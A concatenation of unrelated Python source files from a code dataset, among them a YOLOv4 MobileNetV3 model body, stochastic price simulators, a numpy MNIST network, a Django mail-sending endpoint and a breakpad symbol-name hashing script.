try:
get_secret_value_response = client.get_secret_value(
SecretId= secret_name
)
except ClientError as e:
print("Error getting secret key!: " + str(e))
return None
else:
# Decrypts secret using the associated KMS CMK.
if 'SecretString' in get_secret_value_response:
return get_secret_value_response['SecretString']
return None
def checkError(invoke_response, message):
"""
# checks for errors in lambda functions from invoke
:param invoke_response: response from invoke_lambda
:param message: message to print if error
:return: errors from the response message, None if no errors
"""
if 'FunctionError' in invoke_response:
err_message = invoke_response['Payload'].read()
print(message)
print(err_message)
return {
'statusCode': 500,
'body': json.dumps(str(err_message))
}
return None |
987,163 | 8aead3bb437927f17c67cddc8975592cec94b093 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""YOLO_v4 MobileNetV3Large Model Defined in Keras."""
from tensorflow.keras.layers import ZeroPadding2D, UpSampling2D, Concatenate
from tensorflow.keras.models import Model
from common.backbones.mobilenet_v3 import MobileNetV3Large
#from yolo4.models.layers import compose, DarknetConv2D, DarknetConv2D_BN_Leaky, Spp_Conv2D_BN_Leaky, Depthwise_Separable_Conv2D_BN_Leaky, Darknet_Depthwise_Separable_Conv2D_BN_Leaky, make_yolo_head, make_yolo_spp_head, make_yolo_depthwise_separable_head, make_yolo_spp_depthwise_separable_head
from yolo4.models.layers import yolo4_predictions, yolo4lite_predictions, tiny_yolo4_predictions, tiny_yolo4lite_predictions
def yolo4_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0):
"""Create YOLO_V4 MobileNetV3Large model CNN body in Keras."""
mobilenetv3large = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
print('backbone layers number: {}'.format(len(mobilenetv3large.layers)))
# input: 416 x 416 x 3
# activation_38(layer 194, final feature map): 13 x 13 x (960*alpha)
# expanded_conv_14/Add(layer 191, end of block14): 13 x 13 x (160*alpha)
# activation_29(layer 146, middle in block12) : 26 x 26 x (672*alpha)
# expanded_conv_11/Add(layer 143, end of block11) : 26 x 26 x (112*alpha)
# activation_15(layer 79, middle in block6) : 52 x 52 x (240*alpha)
# expanded_conv_5/Add(layer 76, end of block5): 52 x 52 x (40*alpha)
# NOTE: activation layer name may different for TF1.x/2.x, so we
# use index to fetch layer
# f1: 13 x 13 x (960*alpha)
f1 = mobilenetv3large.layers[194].output
# f2: 26 x 26 x (672*alpha) for 416 input
f2 = mobilenetv3large.layers[146].output
# f3: 52 x 52 x (240*alpha) for 416 input
f3 = mobilenetv3large.layers[79].output
f1_channel_num = int(960*alpha)
f2_channel_num = int(672*alpha)
f3_channel_num = int(240*alpha)
#f1_channel_num = 1024
#f2_channel_num = 512
#f3_channel_num = 256
y1, y2, y3 = yolo4_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes)
return Model(inputs, [y1, y2, y3])
def yolo4lite_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0):
'''Create YOLO_v4 Lite MobileNetV3Large model CNN body in keras.'''
mobilenetv3large = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
print('backbone layers number: {}'.format(len(mobilenetv3large.layers)))
# input: 416 x 416 x 3
# activation_38(layer 194, final feature map): 13 x 13 x (960*alpha)
# expanded_conv_14/Add(layer 191, end of block14): 13 x 13 x (160*alpha)
# activation_29(layer 146, middle in block12) : 26 x 26 x (672*alpha)
# expanded_conv_11/Add(layer 143, end of block11) : 26 x 26 x (112*alpha)
# activation_15(layer 79, middle in block6) : 52 x 52 x (240*alpha)
# expanded_conv_5/Add(layer 76, end of block5): 52 x 52 x (40*alpha)
# NOTE: activation layer name may different for TF1.x/2.x, so we
# use index to fetch layer
# f1: 13 x 13 x (960*alpha)
f1 = mobilenetv3large.layers[194].output
# f2: 26 x 26 x (672*alpha) for 416 input
f2 = mobilenetv3large.layers[146].output
# f3: 52 x 52 x (240*alpha) for 416 input
f3 = mobilenetv3large.layers[79].output
f1_channel_num = int(960*alpha)
f2_channel_num = int(672*alpha)
f3_channel_num = int(240*alpha)
#f1_channel_num = 1024
#f2_channel_num = 512
#f3_channel_num = 256
y1, y2, y3 = yolo4lite_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes)
return Model(inputs, [y1, y2, y3])
def tiny_yolo4_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0, use_spp=True):
'''Create Tiny YOLO_v4 MobileNetV3Large model CNN body in keras.'''
mobilenetv3large = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
print('backbone layers number: {}'.format(len(mobilenetv3large.layers)))
# input: 416 x 416 x 3
# activation_38(layer 194, final feature map): 13 x 13 x (960*alpha)
# expanded_conv_14/Add(layer 191, end of block14): 13 x 13 x (160*alpha)
# activation_29(layer 146, middle in block12) : 26 x 26 x (672*alpha)
# expanded_conv_11/Add(layer 143, end of block11) : 26 x 26 x (112*alpha)
# activation_15(layer 79, middle in block6) : 52 x 52 x (240*alpha)
# expanded_conv_5/Add(layer 76, end of block5): 52 x 52 x (40*alpha)
# f1 :13 x 13 x (960*alpha)
# NOTE: activation layer name may different for TF1.x/2.x, so we
# use index to fetch layer
f1 = mobilenetv3large.layers[194].output
# f2: 26 x 26 x (672*alpha) for 416 input
f2 = mobilenetv3large.layers[146].output
f1_channel_num = int(960*alpha)
f2_channel_num = int(672*alpha)
#f1_channel_num = 1024
#f2_channel_num = 512
y1, y2 = tiny_yolo4_predictions((f1, f2), (f1_channel_num, f2_channel_num), num_anchors, num_classes, use_spp)
return Model(inputs, [y1,y2])
def tiny_yolo4lite_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0, use_spp=True):
'''Create Tiny YOLO_v4 Lite MobileNetV3Large model CNN body in keras.'''
mobilenetv3large = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
print('backbone layers number: {}'.format(len(mobilenetv3large.layers)))
# input: 416 x 416 x 3
# activation_38(layer 194, final feature map): 13 x 13 x (960*alpha)
# expanded_conv_14/Add(layer 191, end of block14): 13 x 13 x (160*alpha)
# activation_29(layer 146, middle in block12) : 26 x 26 x (672*alpha)
# expanded_conv_11/Add(layer 143, end of block11) : 26 x 26 x (112*alpha)
# activation_15(layer 79, middle in block6) : 52 x 52 x (240*alpha)
# expanded_conv_5/Add(layer 76, end of block5): 52 x 52 x (40*alpha)
# f1 :13 x 13 x (960*alpha)
# NOTE: activation layer name may different for TF1.x/2.x, so we
# use index to fetch layer
f1 = mobilenetv3large.layers[194].output
# f2: 26 x 26 x (672*alpha) for 416 input
f2 = mobilenetv3large.layers[146].output
f1_channel_num = int(960*alpha)
f2_channel_num = int(672*alpha)
#f1_channel_num = 1024
#f2_channel_num = 512
y1, y2 = tiny_yolo4lite_predictions((f1, f2), (f1_channel_num, f2_channel_num), num_anchors, num_classes, use_spp)
return Model(inputs, [y1,y2])
|
987,164 | da5287436bcbb03a845e120c3d1a762c3cce9a86 | # Copyright 2020 The iqt Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
import random
import numpy as np
import pandas as pd
import scipy as sp
from iqt.stochastic.processes.gbm import geometric_brownian_motion_log_returns
from iqt.stochastic.utils import ModelParameters, generate, convert_to_prices
# =============================================================================
# Merton Jump Diffusion Stochastic Process
# =============================================================================
def jump_diffusion_process(params: 'ModelParameters') -> 'np.array':
"""Produces a sequence of Jump Sizes which represent a jump diffusion
process.
These jumps are combined with a geometric brownian motion (log returns)
to produce the Merton model.
Parameters
----------
params : ModelParameters
The parameters for the stochastic model.
Returns
-------
`np.array`
The jump sizes for each point in time (mostly zeroes if jumps are
infrequent).
"""
s_n = time = 0
small_lamda = -(1.0 / params.lamda)
jump_sizes = []
for _ in range(params.all_time):
jump_sizes.append(0.0)
while s_n < params.all_time:
s_n += small_lamda * np.log(np.random.uniform(0, 1))
for j in range(params.all_time):
if time * params.all_delta <= s_n * params.all_delta <= (j + 1) * params.all_delta:
jump_sizes[j] += random.normalvariate(params.jumps_mu, params.jumps_sigma)
break
time += 1
return jump_sizes
def geometric_brownian_motion_jump_diffusion_log_returns(params: 'ModelParameters') -> 'np.array':
"""Constructs combines a geometric brownian motion process (log returns)
with a jump diffusion process (log returns) to produce a sequence of gbm
jump returns.
Parameters
----------
params : ModelParameters
The parameters for the stochastic model.
Returns
-------
`np.array`
A GBM process with jumps in it
"""
jump_diffusion = jump_diffusion_process(params)
geometric_brownian_motion = geometric_brownian_motion_log_returns(params)
return np.add(jump_diffusion, geometric_brownian_motion)
def geometric_brownian_motion_jump_diffusion_levels(params: 'ModelParameters') -> 'np.array':
"""Converts a sequence of gbm jmp returns into a price sequence which
evolves according to a geometric brownian motion but can contain jumps
at any point in time.
Parameters
----------
params : ModelParameters
The parameters for the stochastic model.
Returns
-------
`np.array`
The price levels.
"""
return convert_to_prices(params, geometric_brownian_motion_jump_diffusion_log_returns(params))
# =============================================================================
# Heston Stochastic Volatility Process
# =============================================================================
def cox_ingersoll_ross_heston(params: 'ModelParameters') -> 'np.array':
"""Constructs the rate levels of a mean-reverting cox ingersoll ross process.
Used to model interest rates as well as stochastic volatility in the Heston
model. The returns between the underlying and the stochastic volatility
should be correlated we pass a correlated Brownian motion process into the
method from which the interest rate levels are constructed. The other
correlated process are used in the Heston model.
Parameters
----------
params : ModelParameters
The parameters for the stochastic model.
Returns
-------
`np.array`
The interest rate levels for the CIR process
"""
# We don't multiply by sigma here because we do that in heston
sqrt_delta_sigma = np.sqrt(params.all_delta) * params.all_sigma
brownian_motion_volatility = np.random.normal(loc=0, scale=sqrt_delta_sigma, size=params.all_time)
a, mu, zero = params.heston_a, params.heston_mu, params.heston_vol0
volatilities = [zero]
for i in range(1, params.all_time):
drift = a * (mu - volatilities[i - 1]) * params.all_delta
randomness = np.sqrt(volatilities[i - 1]) * brownian_motion_volatility[i - 1]
volatilities.append(volatilities[i - 1] + drift + randomness)
return np.array(brownian_motion_volatility), np.array(volatilities)
def heston_construct_correlated_path(params: 'ModelParameters',
brownian_motion_one: 'np.array') -> 'np.array':
"""A simplified version of the Cholesky decomposition method for just two
assets. It does not make use of matrix algebra and is therefore quite easy
to implement.
Parameters
----------
params : ModelParameters
The parameters for the stochastic model.
brownian_motion_one : `np.array`
(Not filled)
Returns
-------
`np.array`
A correlated brownian motion path.
"""
# We do not multiply by sigma here, we do that in the Heston model
sqrt_delta = np.sqrt(params.all_delta)
# Construct a path correlated to the first path
brownian_motion_two = []
for i in range(params.all_time - 1):
term_one = params.cir_rho * brownian_motion_one[i]
term_two = np.sqrt(1 - pow(params.cir_rho, 2)) * random.normalvariate(0, sqrt_delta)
brownian_motion_two.append(term_one + term_two)
return np.array(brownian_motion_one), np.array(brownian_motion_two)
def heston_model_levels(params: 'ModelParameters') -> 'np.array':
"""Generates price levels corresponding to the Heston model.
The Heston model is the geometric brownian motion model with stochastic
volatility. This stochastic volatility is given by the cox ingersoll ross
process. Step one on this method is to construct two correlated GBM
processes. One is used for the underlying asset prices and the other is used
for the stochastic volatility levels.
Parameters
----------
params : ModelParameters
The parameters for the stochastic model.
Returns
-------
`np.array`
The prices for an underlying following a Heston process
Warnings
--------
This method is dodgy! Need to debug!
"""
# Get two correlated brownian motion sequences for the volatility parameter and the underlying asset
# brownian_motion_market, brownian_motion_vol = get_correlated_paths_simple(param)
brownian, cir_process = cox_ingersoll_ross_heston(params)
brownian, brownian_motion_market = heston_construct_correlated_path(params, brownian)
heston_market_price_levels = [params.all_s0]
for i in range(1, params.all_time):
drift = params.gbm_mu * heston_market_price_levels[i - 1] * params.all_delta
vol = cir_process[i - 1] * heston_market_price_levels[i - 1] * brownian_motion_market[i - 1]
heston_market_price_levels.append(heston_market_price_levels[i - 1] + drift + vol)
return np.array(heston_market_price_levels), np.array(cir_process)
def get_correlated_geometric_brownian_motions(params: 'ModelParameters',
correlation_matrix: 'np.array',
n: int) -> 'np.array':
"""Constructs a basket of correlated asset paths using the Cholesky
decomposition method.
Parameters
----------
params : `ModelParameters`
The parameters for the stochastic model.
correlation_matrix : `np.array`
An n x n correlation matrix.
n : int
Number of assets (number of paths to return)
Returns
-------
`np.array`
n correlated log return geometric brownian motion processes.
"""
decomposition = sp.linalg.cholesky(correlation_matrix, lower=False)
uncorrelated_paths = []
sqrt_delta_sigma = np.sqrt(params.all_delta) * params.all_sigma
# Construct uncorrelated paths to convert into correlated paths
for i in range(params.all_time):
uncorrelated_random_numbers = []
for j in range(n):
uncorrelated_random_numbers.append(random.normalvariate(0, sqrt_delta_sigma))
uncorrelated_paths.append(np.array(uncorrelated_random_numbers))
uncorrelated_matrix = np.asmatrix(uncorrelated_paths)
correlated_matrix = uncorrelated_matrix * decomposition
assert isinstance(correlated_matrix, np.matrix)
# The rest of this method just extracts paths from the matrix
extracted_paths = []
for i in range(1, n + 1):
extracted_paths.append([])
for j in range(0, len(correlated_matrix) * n - n, n):
for i in range(n):
extracted_paths[i].append(correlated_matrix.item(j + i))
return extracted_paths
def heston(base_price: int = 1,
base_volume: int = 1,
start_date: str = '2010-01-01',
start_date_format: str = '%Y-%m-%d',
times_to_generate: int = 1000,
time_frame: str = '1h',
params: 'ModelParameters' = None) -> 'pd.DataFrame':
"""Generates price data from the Heston model.
Parameters
----------
base_price : int, default 1
The base price to use for price generation.
base_volume : int, default 1
The base volume to use for volume generation.
start_date : str, default '2010-01-01'
The start date of the generated data
start_date_format : str, default '%Y-%m-%d'
The format for the start date of the generated data.
times_to_generate : int, default 1000
The number of bars to make.
time_frame : str, default '1h'
The time frame.
params : `ModelParameters`, optional
The model parameters.
Returns
-------
`pd.DataFrame`
The generated data frame containing the OHLCV bars.
"""
data_frame = generate(
price_fn=lambda p: heston_model_levels(p)[0],
base_price=base_price,
base_volume=base_volume,
start_date=start_date,
start_date_format=start_date_format,
times_to_generate=times_to_generate,
time_frame=time_frame,
params=params
)
return data_frame
|
987,165 | 95d7c91bd5cddee6fe2c0a0a6773e4faee77ab39 | import numpy as np
import numpy as np
from numpy import linalg
import matplotlib
import matplotlib.pyplot as plt
from libsvm.svmutil import svm_read_problem
from sklearn.model_selection import train_test_split
def oneHot(array):
result = np.zeros((len(array),10))
for number in range(len(array)):
result[number][int(array[number])] = 1
return result
def softmax(Z):
Z_shift = Z - np.max(Z, axis=0)
A = np.exp(Z_shift) / np.sum(np.exp(Z_shift), axis=0)
cache = Z_shift
return A, cache
def relu(Z):
A = np.maximum(0, Z)
assert (A.shape == Z.shape)
cache = Z
return A, cache
def initialize_parameters(n_x, n_h, n_y):
np.random.seed(1)
W1 = np.random.randn(n_h, n_x) * 0.01
b1 = np.zeros((n_h, 1))
W2 = np.random.randn(n_y, n_h) * 0.01
b2 = np.zeros((n_y, 1))
assert (W1.shape == (n_h, n_x))
assert (b1.shape == (n_h, 1))
assert (W2.shape == (n_y, n_h))
assert (b2.shape == (n_y, 1))
parameters = {"W1": W1,
"b1": b1,
"W2": W2,
"b2": b2}
return parameters
def linear_forward(A, W, b):
Z = np.dot(W, A) + b
assert (Z.shape == (W.shape[0], A.shape[1]))
cache = (A, W, b)
return Z, cache
def linear_activation_forward(A_prev, W, b, activation):
if activation == "softmax":
# Inputs: "A_prev, W, b". Outputs: "A, activation_cache".
Z, linear_cache = linear_forward(A_prev, W, b)
A, activation_cache = softmax(Z)
elif activation == "relu":
# Inputs: "A_prev, W, b". Outputs: "A, activation_cache".
Z, linear_cache = linear_forward(A_prev, W, b)
A, activation_cache = relu(Z)
assert (A.shape == (W.shape[0], A_prev.shape[1]))
cache = (linear_cache, activation_cache)
return A, cache
def compute_cost(AL, Y):
m = Y.shape[1]
cost = -(np.sum(Y * np.log(AL))) / float(m)
# cost = np.squeeze(cost)
assert (cost.shape == ())
return cost
def linear_backward(dZ, cache):
A_prev, W, b = cache
m = A_prev.shape[1]
dW = np.dot(dZ, A_prev.T) / float(m)
db = np.sum(dZ, axis=1, keepdims=True) / float(m)
dA_prev = np.dot(W.T, dZ)
assert (dA_prev.shape == A_prev.shape)
assert (dW.shape == W.shape)
assert (db.shape == b.shape)
return dA_prev, dW, db
def relu_backward(dA, cache):
Z = cache
dZ = np.array(dA, copy=True)
dZ[Z <= 0] = 0
assert (dZ.shape == Z.shape)
return dZ
def softmax_backward(Y, cache):
Z = cache
s = np.exp(Z) / np.sum(np.exp(Z), axis=0)
dZ = s - Y
assert (dZ.shape == Z.shape)
return dZ
def linear_activation_backward(dA, cache, activation):
linear_cache, activation_cache = cache
if activation == "relu":
dZ = relu_backward(dA, activation_cache)
dA_prev, dW, db = linear_backward(dZ, linear_cache)
elif activation == "softmax":
dZ = softmax_backward(dA, activation_cache)
dA_prev, dW, db = linear_backward(dZ, linear_cache)
return dA_prev, dW, db
def update_parameters(parameters, grads, learning_rate):
L = len(parameters) // 2 # number of layers in the neural network
# Update rule for each parameter. Use a for loop.
for l in range(1, L + 1):
parameters['W' + str(l)] -= learning_rate * grads['dW' + str(l)]
parameters['b' + str(l)] -= learning_rate * grads['db' + str(l)]
return parameters
def two_layer_model(X, Y, layers_dims, learning_rate=0.1, num_iterations=3000, print_cost=False):
np.random.seed(1)
grads = {}
costs = [] # to keep track of the cost
m = X.shape[1] # number of examples
(n_x, n_h, n_y) = layers_dims
# Initialize parameters dictionary, by calling one of the functions you'd previously implemented
parameters = initialize_parameters(n_x, n_h, n_y)
# Get W1, b1, W2 and b2 from the dictionary parameters.
W1 = parameters["W1"]
b1 = parameters["b1"]
W2 = parameters["W2"]
b2 = parameters["b2"]
# Loop (gradient descent)
for i in range(0, num_iterations):
# Forward propagation
A1, cache1 = linear_activation_forward(X, W1, b1, activation='relu')
A2, cache2 = linear_activation_forward(A1, W2, b2, activation='softmax')
# Compute cost
cost = compute_cost(A2, Y)
# Backward propagation
dA1, dW2, db2 = linear_activation_backward(Y, cache2, activation='softmax')
dA0, dW1, db1 = linear_activation_backward(dA1, cache1, activation='relu')
grads['dW1'] = dW1
grads['db1'] = db1
grads['dW2'] = dW2
grads['db2'] = db2
# Update parameters.
parameters = update_parameters(parameters, grads, learning_rate)
W1 = parameters["W1"]
b1 = parameters["b1"]
W2 = parameters["W2"]
b2 = parameters["b2"]
# Print the cost every 100 training example
if i % 50 == 0:
print("Cost after iteration {}: {}".format(i, np.squeeze(cost)))
costs.append(cost)
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title("Learning rate =" + str(learning_rate))
plt.show()
return parameters
def predict(X, y, parameters):
m = X.shape[1]
W1 = parameters["W1"]
b1 = parameters["b1"]
W2 = parameters["W2"]
b2 = parameters["b2"]
A1, _ = linear_activation_forward(X, W1, b1, activation='relu')
probs, _ = linear_activation_forward(A1, W2, b2, activation='softmax')
predicted = np.argmax(probs, axis=0)
# print ("predictions: " + str(p))
# print ("true labels: " + str(y))
print(m, ' test case predicted.', sep='')
correct_num = np.sum(predicted == y)
print(correct_num, ' are correct.', sep='')
#print('Accuracy = ', np.round(correct_num * 100 / len(predicted)), '%', sep='')
print("Accuracy = " + str(correct_num / float(m)), sep='')
return predicted
y_raw, x_raw = svm_read_problem('mnist.scale')
y = np.array(y_raw)
x = np.zeros((len(y_raw), 780))
for i in range(len(y_raw)):
line = x_raw[i]
for k, v in line.items():
x[i][k - 1] = v
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)
y_train = oneHot(y_train)
print('====== Binary (Digit 1 and 2) =======')
y_bin = np.concatenate((y[y==1],[0]*sum(y==2)))
temp = np.zeros((len(y_bin), 2))
for number in range(len(y_bin)):
temp[number][int(y_bin[number])] = 1
y_bin = temp
x_bin = np.concatenate((x[y==1],x[y==2]))
x_train_bin, x_test_bin, y_train_bin, y_test_bin = train_test_split(x_bin, y_bin, test_size=0.3)
parameters_bin = two_layer_model(x_train_bin.T, y_train_bin.T, (780, 100, 2), 0.1, 100, True)
prediction_bin = predict(x_test_bin.T, y_test_bin.T, parameters_bin)
print('====== Multi-class =======')
parameters = two_layer_model(x_train.T, y_train.T, (780, 100, 10), 0.1, 300, True)
prediction = predict(x_test.T, y_test.T, parameters)
|
987,166 | f934de4f888f78e3ac9e4e0511ae7e3dbcdf5e34 | # -*- coding: utf-8 -*-
import json
from restless.views import Endpoint
from restless.auth import BasicHttpAuthMixin, login_required
from django.template import Context as C
from django.template import Template as T
from mails.models import Application, Log, Template
from mails.mailserver import MailServer
def message(status, content):
return {"status": status, "content": content}
class MailsAPI(Endpoint, BasicHttpAuthMixin):
@login_required
def post(self, request):
try:
data = json.loads(request.body)
except ValueError, e:
return message(False, unicode(e))
app_label = data.get("app")
applications = Application.objects.filter(name=app_label)
if not applications:
return message(False, "Application not found.")
application = applications[0]
template_label = data.get("template")
templates = Template.objects.filter(name=template_label)
if not templates:
return message(False, "Template not found.")
template = templates[0]
sender = application.default_sender
receiver = data.get("receiver")
context = data.get("context")
subject = template.subject
content = T(template.content).render(C(context))
server = MailServer(
application.host,
application.port,
application.username,
application.password,
application.use_ssl)
server.sendmail(sender, receiver, subject, content)
Log.objects.create(
application=application,
sender=sender,
receiver=receiver,
subject=subject,
content=content)
return message(True, "Messsage sent.")
|
987,167 | 60c229c56f5c64efe436430208aa47f7bfacd061 | for 단 in range(1,10):
for 곱 in range(1,10):
print(단,"x",곱,"=",(단*곱))
# 알고리즘 순서도
# * 줄1 공백 4 별1 현재줄수*2 2-1
# *** 줄2 공백3 별3 현재줄수*2 4-1
# ***** 줄3 공백 2 별5 현재줄수*2 6-1
# ******* 줄4 공백1 별7 현재줄수*2 8-1
# ********* 줄5 공백0 별9 현재줄수*2 10-1
# 1씩증가 1씩 감소 2씩증가
# 최대줄수-현재줄수 현재줄수*2-1
# range(1,6) " "*(6-변수) "*"*(현재줄수*2-1) |
987,168 | ce92bdb41915dbbefc952fdc047e5c72132f20ca | """
Build an estimating model for vehicle fuel consumption
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import linear_model
from sklearn import svm
car = pd.read_csv("C:\\...")
car.head()
df = car.loc[:, ['FC_L1', 'Veh_Speed.m.s.', 'Acceleration']]
df.columns = ['FC_L1', 'S', 'A']
df['S2'] = df['S']**2
df['S3'] = df['S']**3
df['A2'] = df['A']**2
df['A3'] = df['A']**3
df['SA'] = df['S']*df['A']
df['S2A'] = df['S']**2*df['A']
df['S3A'] = df['S']**3*df['A']
df['SA2'] = df['S']*df['A']**2
df['S2A2'] = df['S']**2*df['A']**2
df['S3A2'] = df['S']**3*df['A']**2
df['SA3'] = df['S']*df['A']**3
df['S2A3'] = df['S']**2*df['A']**3
df['S3A3'] = df['S']**3*df['A']**3
df_acc = df.loc[df['A']>=0]
df_acc = df_acc.reset_index(drop=True)
df_dec = df.loc[df['A']<0]
df_dec = df_dec.reset_index(drop=True)
df_acc_X_train = df_acc.drop('FC_L1', 1)[:-109095]
df_acc_X_test = df_acc.drop('FC_L1', 1)[-109095:]
df_acc_y_train = np.log(df_acc.FC_L1[:-109095])
df_acc_y_test = np.log(df_acc.FC_L1[-109095:])
df_dec_X_train = df_dec.drop('FC_L1', 1)[:-109095]
df_dec_X_test = df_dec.drop('FC_L1', 1)[-109095:]
df_dec_y_train = np.log(df_dec.FC_L1[:-41051])
df_dec_y_test = np.log(df_dec.FC_L1[-41051:])
#fit regression model
regr_acc = linear_model.LinearRegression()
regr_acc.fit(df_acc_X_train, df_acc_y_train)
#coefficients
print('Coefficients: \n', regr_acc.coef_)
#mean squared error
print("Mean squared error: %.2f"
% np.mean((regr_acc.predict(df_acc_X_test) - df_acc_y_test) ** 2))
#explained variance score: 1 is perfect prediction
print('Variance score: %.2f' % regr_acc.score(df_acc_X_test, df_acc_y_test))
#SVM
clf = svm.SVR(kernel='linear', C=1e3)
clf.fit(df_acc_X_train, df_acc_y_train)
np.mean((clf.predict(df_acc_X_test) - df_acc_y_test) ** 2)
clf.score(df_acc_X_test, df_acc_y_test)
cross_val_score(clf, df_acc_X_test, df_acc_y_test, scoring='neg_log_loss')
#decision tree
from sklearn import tree
from sklearn.model_selection import cross_val_score
tlf = tree.DecisionTreeRegressor()
tlf = tlf.fit(df_acc_X_train, df_acc_y_train)
np.mean((tlf.predict(df_acc_X_test) - df_acc_y_test) ** 2)
tlf.score(df_acc_X_train, df_acc_y_train)
#cross_val_score(tlf, df_acc_X_test, df_acc_y_test, scoring='neg_log_loss')
|
987,169 | cd37772ee80d981dffdef5500dc2a854a873137d | #!/usr/bin/env python
# coding: utf-8
import yaml
from responses import *
def assign_response(message):
message = message.lower()
words = message.split(' ')
if words[0] == '.pasquale':
return build_pasquale_response(words[1])
if message == '.cilia':
return build_cilia_response()
elif message == '.boulas':
return build_boulas_response()
elif message == '.idelber':
return build_idelber_response()
elif message == '.fazzi':
return build_fazzi_response()
elif message in ['.brasil-autoctone','.braut']:
return build_braut_response()
elif message == '.lucyborn':
return build_lucyborn_response()
elif message == '.pupo':
return build_pupo_response()
elif message == '.assis':
return build_assis_response()
elif message == '#paradox':
return build_nazi_response()
elif message == '.gamers':
return build_gamers_response()
elif words[0] in ['.salario','.salário']:
return build_salario_response(words[1])
else:
return build_random_response()
|
987,170 | 38217b5e55cb9a359e2ce6048f0255132945d7ca | import time
from report import report_sxw
from osv import osv,fields
from report.render import render
import pooler
from tools.translate import _
from ad_num2word_id import num2word
import locale
from collections import OrderedDict
class bill_passing_parser(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(bill_passing_parser, self).__init__(cr, uid, name, context=context)
#=======================================================================
self.line_no = 0
self.localcontext.update({
'time': time,
})
report_sxw.report_sxw('report.bill.passing.report.form', 'account.bill.passing', 'ad_sales_agent_bitratex/account_bill_passing_report.mako', parser=bill_passing_parser,header=False) |
987,171 | f5a1ef2f0af81162f77199a22eb8bf632a60a1b6 | # -*- coding: utf-8 -*-
import os
from google.appengine.api import mail
from google.appengine.api import users
from google.appengine.ext import ndb
from datetime import datetime, timedelta
import jinja2
import webapp2
import uuid
import urllib
import urllib2
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class MainPage(webapp2.RequestHandler):
def get(self):
template_values = {
}
template = JINJA_ENVIRONMENT.get_template('fumao.html')
self.response.write(template.render(template_values))
application = webapp2.WSGIApplication([
('/', MainPage),
], debug=True) |
987,172 | 08988ecde5023f5852ccfb8b53c6d25e55dca2d0 | from django.shortcuts import render
from django.urls import path
from pages import views
urlpatterns = [
path('', views.HomeView, name='index'),
] |
987,173 | 7949565c185eb67d675fdc4f5bb8996d72044aa7 | # 执行用时:124 ms
# 内存消耗:18.9 MB
# 方案:所有的亮灯都连续排列在数组最左边,没有间断; 那么本题目转化为:判断 当前时刻亮灯的最大编号 是否 等于亮灯的数量
class Solution:
def numTimesAllBlue(self, light: List[int]) -> int:
# 所有的亮灯都连续排列在数组最左边,没有间断
# 判断 当前时刻亮灯的最大编号 是否 等于亮灯的数量
rst, maxx = 0, 0
for idx, on_light in enumerate(light):
maxx = max(maxx, on_light)
if maxx == idx + 1:
rst += 1
return rst
|
987,174 | ae8c79203df733e42133e60d35130560d2af280a | MAGIC_NUM = 1000000007
left_cnt_P = [0 for _ in range(100010)]
s = input()
for i in range(len(s)):
if i > 0: left_cnt_P[i] = left_cnt_P[i - 1]
if s[i] == 'P': left_cnt_P[i] += 1
result = 0
right_num_T = 0
for i in range(len(s)-1,-1,-1):
if s[i] == 'T': right_num_T += 1
elif s[i] == 'A': result = (result + left_cnt_P[i]*right_num_T) % MAGIC_NUM
print(result)
|
987,175 | d38e7d4fdc7277a9e06dc8ebbd69ccc66631a321 | class Critter(object):
def __init__(self):
print("A new critter has been born!")
def talk(self):
print("\nHi, I'm an instance of class Critter.")
crit1 = Critter()
crit2 = Critter()
crit2.talk()
crit1.talk() |
987,176 | 268f0ead377365d540f4ad991fb6c62f2847a557 | import hmac, hashlib, sys, re
numfinder = re.compile('[0-9a-f]+$')
def encrypt(infd, outfd, hashphrase, prefix, striplinenumbers=False):
"""
Read a breakpad .sym file from infd. Using the given hashphrase,
one-way-hash any function and file names mentioned in the symbol file.
`hashphrase` should be a secret, and should be the same every time this
script is run.
`prefix` is a vendor prefix, and should be a string provided by Mozilla.
If `striplinenumbers` is true, remove all line number information
from the symbols.
This method returns a dictionary mapping the encrypted names back to
the real names. When run from the command line, these will be saved in a
log file.
"""
namemap = {}
def encryptname(name):
hash = prefix + hmac.new(hashphrase, name, digestmod=hashlib.sha256).hexdigest()
namemap[hash] = name
return hash
for line in infd:
line = line.strip()
command, rest = line.split(None, 1)
if command == 'FILE':
number, name = rest.split(None, 1)
line = ' '.join([command, number, encryptname(name)])
elif command == 'PUBLIC':
address, psize, name = rest.split(None, 2)
line = ' '.join([command, address, psize, encryptname(name)])
elif command == 'FUNC':
address, size, psize, name = rest.split(None, 3)
line = ' '.join([command, address, size, psize, encryptname(name)])
elif command in ('STACK', 'MODULE'):
pass # Nothing to encrypt
elif numfinder.match(command):
if striplinenumbers:
continue
else:
raise KeyError("Unexpected symbol instruction: '%s'" % command)
outfd.write(line + '\n')
return namemap
if __name__ == '__main__':
from optparse import OptionParser
import csv
o = OptionParser(usage="usage: %prog [options] sourcefile destfile hashphrase prefix")
o.add_option('-s', '--strip-line-numbers', action="store_true", dest="striplinenumbers", default=False)
options, args = o.parse_args()
if len(args) != 4:
o.print_help()
sys.exit(1)
